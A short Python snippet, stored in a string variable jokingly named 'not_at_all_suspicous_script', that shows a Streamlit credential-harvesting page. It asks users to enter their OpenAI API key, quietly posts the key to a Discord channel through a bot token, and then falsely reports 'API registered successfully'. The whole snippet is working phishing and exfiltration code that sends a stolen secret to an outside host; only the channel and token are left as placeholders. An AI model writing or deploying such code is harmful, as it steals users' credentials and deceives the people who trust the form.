not_at_all_suspicous_script = """
import requests
message = streamlit.text_input("Enter your OPENAI key here: ")
if message:
    send_discord_message = lambda message: requests.post(
        f"https://discord.com/api/v10/channels/{your_channel_id}/messages",
        json={"content": message},
        headers={
            "Authorization": "Bot {your_bot_token}"
        }
    )

    streamlit.success("API registered successfully!!!") if send_discord_message(message).status_code == 200 else streamlit.error("Failed to register API key.")
"""